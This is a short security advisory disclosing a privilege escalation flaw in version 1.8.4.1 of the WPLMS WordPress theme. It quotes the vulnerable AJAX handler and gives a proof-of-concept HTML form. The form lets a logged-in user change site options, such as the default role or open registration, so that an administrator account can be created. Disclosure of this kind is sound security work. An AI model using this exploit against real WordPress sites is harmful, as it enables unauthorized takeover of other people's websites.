------------------------------------------------------------------------------ WordPress WPLMS Theme Previlege Escalation ------------------------------------------------------------------------------ [-] Author: Evex http://packetstormsecurity.com/user/evex/ twitter: https://twitter.com/Evexola [-] Theme Link: http://themeforest.net/item/wplms-learning-management-system/6780226 [-] Affected Version: Version 1.8.4.1 [-] Vulnerability Description: The vulnerable code is located in the /includes/func.php script: add_action( 'wp_ajax_import_data', 'import_data' ); function import_data(){ $name = stripslashes($_POST['name']); $code = base64_decode(trim($_POST['code'])); if(is_string($code)) $code = unserialize ($code); $value = get_option($name); if(isset($value)){ update_option($name,$code); }else{ echo "Error, Option does not exist !"; } die(); } then function import_data can be called by logged in users and executed which can lead to modifying wordpress settings and adding a new administrator which may cause the site a full take over [-] Proof of Concept: (Must be submited with a logged in user) OPTION: admin_email, default_role, users_can_register Value(must be serialized then encoded by base64): users_can_register (0,1) default_role (administrator, author, editor...) admin_email( whatever@duh.com ) <form action="http://domain.tld/wp-admin/admin-ajax.php?action=import_data" method="post" > <input type="hidden" name="name" value="OPTION" /> <input type="hidden" name="code" value="VALUE" /> <button type="submit" >Submit</button> </form>